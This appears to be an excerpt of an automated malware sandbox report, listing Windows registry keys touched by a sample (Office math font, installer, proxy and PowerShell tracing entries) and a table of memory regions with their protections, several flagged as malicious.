Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
There are 332 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
541000
heap
page read and write
malicious
63D0000
trusted library section
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
35A9000
trusted library allocation
page read and write
malicious
525000
heap
page read and write
malicious
3FA9000
trusted library allocation
page read and write
malicious
2BA5000
heap
page read and write
3A5E000
stack
page read and write
4120000
trusted library allocation
page read and write
5F5D000
stack
page read and write
3B90000
heap
page read and write
32B000
stack
page read and write
4F60000
heap
page read and write
4B9E000
stack
page read and write
478000
remote allocation
page execute and read and write
2B1E000
heap
page read and write
4B8F000
stack
page read and write
1D70000
trusted library allocation
page read and write
22E000
heap
page read and write
3D9F000
stack
page read and write
1EA000
trusted library allocation
page read and write
436000
heap
page read and write
22EC000
stack
page read and write
5DBE000
stack
page read and write
4C3E000
stack
page read and write
2B2F000
heap
page read and write
4E9F000
stack
page read and write
570000
heap
page read and write
2C38000
heap
page read and write
23A2000
trusted library allocation
page read and write
550000
trusted library allocation
page read and write
1D9000
heap
page read and write
C20000
heap
page read and write
4EA0000
heap
page read and write
2190000
trusted library allocation
page execute and read and write
600000
heap
page read and write
2BA0000
heap
page read and write
290000
trusted library allocation
page execute and read and write
2200000
trusted library allocation
page read and write
4476000
heap
page execute and read and write
210000
trusted library allocation
page read and write
4ACF000
stack
page read and write
25C6000
trusted library allocation
page read and write
4C0000
heap
page read and write
225E000
stack
page read and write
245000
trusted library allocation
page execute and read and write
590000
trusted library allocation
page read and write
43D0000
trusted library allocation
page execute and read and write
255000
heap
page read and write
38C0000
heap
page read and write
1DE0000
trusted library allocation
page read and write
540000
trusted library allocation
page execute and read and write
86E000
heap
page read and write
4D8E000
stack
page read and write
2B34000
heap
page read and write
34B0000
trusted library allocation
page read and write
365F000
stack
page read and write
10C000
stack
page read and write
D1E000
stack
page read and write
2B92000
heap
page read and write
4B4C000
stack
page read and write
1D7000
stack
page read and write
3360000
trusted library allocation
page read and write
F70000
heap
page read and write
4120000
trusted library allocation
page read and write
530000
trusted library allocation
page read and write
530000
trusted library allocation
page read and write
4C90000
heap
page read and write
3680000
heap
page read and write
520000
trusted library allocation
page read and write
3C6000
heap
page execute and read and write
1DF0000
trusted library allocation
page read and write
BB000
stack
page read and write
3361000
trusted library allocation
page read and write
2BA9000
heap
page read and write
255000
heap
page read and write
7DE000
stack
page read and write
441E000
stack
page read and write
A7E000
stack
page read and write
460000
heap
page read and write
21AE000
stack
page read and write
8B8000
heap
page read and write
36DD000
heap
page read and write
64B000
heap
page read and write
26D6000
trusted library allocation
page read and write
2B28000
heap
page read and write
4F8D000
heap
page read and write
393F000
stack
page read and write
255000
heap
page read and write
4B8E000
stack
page read and write | page guard
4CF000
stack
page read and write
267000
heap
page read and write
271D000
trusted library allocation
page read and write
257E000
stack
page read and write
4A7A000
stack
page read and write
2B71000
heap
page read and write
233F000
stack
page read and write
1E0000
trusted library allocation
page read and write
7CE000
stack
page read and write
25D000
heap
page read and write
5E7F000
stack
page read and write
2BCE000
stack
page read and write
21F0000
trusted library allocation
page read and write
2426000
trusted library allocation
page read and write
3360000
trusted library allocation
page read and write
634000
heap
page read and write
4DB0000
heap
page read and write
51A000
heap
page read and write
50CC000
heap
page read and write
167000
heap
page read and write
5070000
heap
page read and write
2200000
trusted library allocation
page read and write
1E4000
trusted library allocation
page read and write
2C34000
heap
page read and write
2C0000
trusted library allocation
page read and write
A5D000
heap
page read and write
2B1D000
heap
page read and write
2B9D000
heap
page read and write
4120000
trusted library allocation
page read and write
25D7000
trusted library allocation
page read and write
467000
heap
page read and write
1E0000
trusted library allocation
page read and write
5DDE000
stack
page read and write
2A0000
heap
page read and write
4C8E000
stack
page read and write | page guard
598000
heap
page read and write
4ECC000
heap
page read and write
A6D000
heap
page read and write
2544000
heap
page read and write
2725000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
4360000
trusted library allocation
page read and write
4070000
trusted library allocation
page read and write
2B95000
heap
page read and write
498C000
trusted library allocation
page read and write
25A000
heap
page read and write
46A000
heap
page read and write
4C8F000
stack
page read and write
21A0000
trusted library allocation
page read and write
2FC000
stack
page read and write
35C000
stack
page read and write
2F20000
heap
page read and write
2A4F000
stack
page read and write
232000
heap
page read and write
2C9000
trusted library allocation
page read and write
1AC000
stack
page read and write
507000
heap
page read and write
F5E000
stack
page read and write
1ED000
trusted library allocation
page execute and read and write
4DDE000
stack
page read and write
2562000
heap
page read and write
212000
trusted library allocation
page read and write
3B7D000
stack
page read and write
2150000
trusted library allocation
page read and write
2310000
trusted library allocation
page read and write
21FF000
stack
page read and write
1D3000
trusted library allocation
page execute and read and write
21B0000
trusted library allocation
page read and write
2B2F000
heap
page read and write
229D000
stack
page read and write
445B000
stack
page read and write
50C4000
heap
page read and write
2609000
trusted library allocation
page read and write
2B81000
heap
page read and write
498A000
trusted library allocation
page read and write
2B73000
heap
page read and write
716000
heap
page read and write
4C1E000
stack
page read and write
233000
heap
page read and write
216F000
stack
page read and write
270000
trusted library allocation
page read and write
5D1000
heap
page read and write
4F70000
heap
page read and write
1E3E000
stack
page read and write
6060000
heap
page read and write
63E000
stack
page read and write
2723000
trusted library allocation
page read and write
215000
trusted library allocation
page execute and read and write
19E000
heap
page read and write
4980000
trusted library allocation
page read and write
4ABE000
stack
page read and write
4AFE000
stack
page read and write
22C000
heap
page read and write
5F0E000
stack
page read and write
470000
trusted library allocation
page read and write
1F60000
direct allocation
page read and write
364F000
stack
page read and write
500000
heap
page read and write
1E80000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
5BDE000
stack
page read and write
180000
trusted library allocation
page read and write
4370000
trusted library allocation
page execute and read and write
2B86000
heap
page read and write
49AE000
stack
page read and write
4120000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
10000
heap
page read and write
23C000
heap
page read and write
271F000
trusted library allocation
page read and write
523E000
stack
page read and write
23C000
heap
page read and write
2D7E000
heap
page read and write
10000
heap
page read and write
22AF000
stack
page read and write
4120000
trusted library allocation
page read and write
842000
heap
page read and write
500000
trusted library allocation
page read and write
2540000
heap
page read and write
4EFE000
stack
page read and write
5FEE000
stack
page read and write
21EE000
stack
page read and write
238000
heap
page read and write
1A0000
heap
page read and write
63CE000
stack
page read and write
33D9000
trusted library allocation
page read and write
1DBF000
stack
page read and write
409000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
5ECD000
stack
page read and write
455000
heap
page read and write
4A4E000
stack
page read and write
255000
heap
page read and write
820000
heap
page read and write
370000
heap
page read and write
98E000
stack
page read and write
474000
remote allocation
page execute and read and write
2D85000
heap
page read and write
25BC000
trusted library allocation
page read and write
3C9F000
stack
page read and write
8BF000
heap
page read and write
50E000
stack
page read and write
496D000
stack
page read and write
249A000
trusted library allocation
page read and write
26B7000
trusted library allocation
page read and write
1D4000
trusted library allocation
page read and write
2222000
heap
page read and write
224000
heap
page read and write
2D86000
heap
page read and write
4070000
trusted library allocation
page read and write
2704000
trusted library allocation
page read and write
570000
trusted library allocation
page execute and read and write
577000
heap
page read and write
640000
heap
page read and write
51B0000
heap
page read and write
36EF000
heap
page read and write
2B1E000
heap
page read and write
4E7000
heap
page read and write
3704000
heap
page read and write
237E000
stack
page read and write
2727000
trusted library allocation
page read and write
2B79000
heap
page read and write
2B8D000
stack
page read and write
3450000
heap
page read and write
A40000
heap
page read and write
2B6E000
unkown
page read and write
603000
heap
page read and write
588000
heap
page read and write
217000
trusted library allocation
page execute and read and write
410000
heap
page read and write
1D0000
trusted library allocation
page read and write
2C7000
trusted library allocation
page read and write
2B63000
heap
page read and write
25FB000
trusted library allocation
page read and write
224D000
stack
page read and write
5CEE000
stack
page read and write
418000
heap
page read and write
284000
heap
page read and write
2204000
heap
page read and write
8CC000
heap
page read and write
A83000
heap
page read and write
62AE000
stack
page read and write
2B4B000
heap
page read and write
509D000
heap
page read and write
3F20000
heap
page read and write
7E8000
heap
page read and write
59F000
heap
page read and write
278000
trusted library allocation
page read and write
25C8000
trusted library allocation
page read and write
2210000
trusted library allocation
page read and write
2678000
trusted library allocation
page read and write
560000
trusted library allocation
page read and write
36FF000
heap
page read and write
6020000
heap
page read and write
322E000
stack
page read and write
4E0000
trusted library allocation
page read and write
2B2F000
heap
page read and write
49EE000
stack
page read and write
3360000
trusted library allocation
page read and write
7EF20000
trusted library allocation
page execute and read and write
480000
trusted library allocation
page execute and read and write
2D85000
heap
page read and write
2D21000
heap
page read and write
25F9000
trusted library allocation
page read and write
5E2000
heap
page read and write
57D000
heap
page read and write
462000
heap
page read and write
18F000
heap
page read and write
2BF8000
heap
page read and write
2160000
trusted library allocation
page read and write
2390000
heap
page read and write
26F7000
trusted library allocation
page read and write
5104000
heap
page read and write
2E7E000
stack
page read and write
244B000
trusted library allocation
page read and write
2B8D000
heap
page read and write
1D9000
heap
page read and write
10000
heap
page read and write
D0000
heap
page read and write
6EE000
stack
page read and write
4CCE000
stack
page read and write
2B76000
heap
page read and write
D30000
heap
page read and write
2A4E000
stack
page read and write
2140000
trusted library allocation
page read and write
88000
stack
page read and write
2320000
heap
page execute and read and write
89000
stack
page read and write
25D3000
trusted library allocation
page read and write
53C000
heap
page read and write
2D7E000
heap
page read and write
400000
trusted library allocation
page read and write
34C9000
trusted library allocation
page read and write
23C000
heap
page read and write
2A8C000
stack
page read and write
2BF0000
heap
page read and write
4F5000
heap
page read and write
5D6E000
stack
page read and write
4904000
heap
page read and write
405C000
stack
page read and write
36C0000
heap
page read and write
1E8F000
stack
page read and write
10000
heap
page read and write
38BF000
stack
page read and write
5C92000
heap
page read and write
240000
trusted library allocation
page read and write
180000
heap
page read and write
509F000
heap
page read and write
4E3E000
stack
page read and write
2D1F000
stack
page read and write
4B5E000
stack
page read and write
2774000
trusted library allocation
page read and write
2404000
trusted library allocation
page read and write
2764000
trusted library allocation
page read and write
4460000
trusted library allocation
page read and write
2D79000
heap
page read and write
2C30000
heap
page read and write
2D9E000
stack
page read and write
46F000
heap
page read and write
4120000
trusted library allocation
page read and write
805000
heap
page read and write
57E000
stack
page read and write
37FF000
stack
page read and write
F2E000
stack
page read and write
43BE000
stack
page read and write
4DB000
heap
page read and write
25A000
heap
page read and write
4900000
heap
page read and write
2B40000
heap
page read and write
710000
heap
page read and write
2D8000
heap
page read and write
18C000
stack
page read and write
2361000
trusted library allocation
page read and write
2D0000
heap
page read and write
20000
heap
page read and write
10000
heap
page read and write
33D1000
trusted library allocation
page read and write
A7E000
heap
page read and write
33F9000
trusted library allocation
page read and write
2BCF000
stack
page read and write
1F0000
trusted library allocation
page read and write
1F50000
heap
page read and write
2D81000
heap
page read and write
59A000
heap
page read and write
1E8000
heap
page read and write
3940000
heap
page read and write
2B9D000
heap
page read and write
27000
heap
page read and write
26FF000
stack
page read and write
2D79000
heap
page read and write
455D000
stack
page read and write
4DB3000
heap
page read and write
46D000
heap
page read and write
4A0000
heap
page read and write
196000
heap
page read and write
23C000
heap
page read and write
5088000
heap
page read and write
5E2E000
stack
page read and write
5C74000
heap
page read and write
4120000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
4FB0000
heap
page read and write
46C000
heap
page read and write
510000
heap
page read and write
2D20000
heap
page read and write
2B50000
heap
page read and write
4922000
heap
page read and write
3E9F000
stack
page read and write
5D0E000
stack
page read and write
18A000
stack
page read and write
2BF4000
heap
page read and write
497E000
stack
page read and write
2250000
trusted library allocation
page read and write
4C6E000
stack
page read and write
C1F000
stack
page read and write
7E0000
heap
page read and write
2C3000
trusted library allocation
page read and write
1D30000
direct allocation
page read and write
59C000
heap
page read and write
451C000
stack
page read and write
580000
heap
page read and write
356000
stack
page read and write
4120000
trusted library allocation
page read and write
8AE000
heap
page read and write
233B000
stack
page read and write
25D3000
trusted library allocation
page read and write
2AC6000
trusted library allocation
page read and write
2B43000
heap
page read and write
3DE000
stack
page read and write
2B7E000
heap
page read and write
18D000
heap
page read and write
5C70000
heap
page read and write
1DD000
trusted library allocation
page execute and read and write
1E7E000
stack
page read and write
260000
heap
page read and write
250000
heap
page read and write
1ECE000
stack
page read and write
5DE000
heap
page read and write
28F000
heap
page read and write
361E000
stack
page read and write
2B79000
heap
page read and write
594000
heap
page read and write
21A0000
trusted library allocation
page read and write
2252000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
271B000
trusted library allocation
page read and write
197000
heap
page read and write
CA0000
heap
page read and write
2181000
trusted library allocation
page read and write
4DF000
heap
page read and write
660000
heap
page read and write
464B000
stack
page read and write
5EA000
heap
page read and write
25D000
heap
page read and write
790000
trusted library allocation
page read and write
623000
heap
page read and write
3A7E000
stack
page read and write
28AF000
stack
page read and write
2B21000
heap
page read and write
2C0E000
stack
page read and write
34C2000
trusted library allocation
page read and write
5113000
heap
page read and write
E8E000
stack
page read and write
242000
trusted library allocation
page read and write
22F000
heap
page read and write
451E000
stack
page read and write
184000
heap
page read and write
1D0000
heap
page read and write
2B3B000
heap
page read and write
5EE000
stack
page read and write
573000
heap
page read and write
2200000
heap
page read and write
4470000
heap
page execute and read and write
49EF000
stack
page read and write
604000
heap
page read and write
5D7E000
stack
page read and write
3389000
trusted library allocation
page read and write
3EFD000
stack
page read and write
5F0000
trusted library allocation
page read and write
2B00000
heap
page read and write
2C3B000
heap
page read and write
4070000
trusted library allocation
page read and write
41E000
stack
page read and write
280000
heap
page read and write
5A0000
trusted library allocation
page read and write
B50000
heap
page read and write
237000
stack
page read and write
45C000
stack
page read and write
23D1000
trusted library allocation
page read and write
243F000
stack
page read and write
294F000
stack
page read and write
240000
trusted library allocation
page execute and read and write
CC000
stack
page read and write
20000
heap
page read and write
6211000
heap
page read and write
10000
heap
page read and write
46C000
heap
page read and write
2D0000
heap
page execute and read and write
3A0000
trusted library allocation
page read and write
5D0000
heap
page read and write
2A0000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
54D000
stack
page read and write
1FA000
trusted library allocation
page read and write
160000
heap
page read and write
826000
heap
page read and write
2BFB000
heap
page read and write
2B53000
heap
page read and write
245F000
stack
page read and write
325E000
stack
page read and write
26FB000
trusted library allocation
page read and write
4EBD000
stack
page read and write
50AC000
heap
page read and write
22D000
heap
page read and write
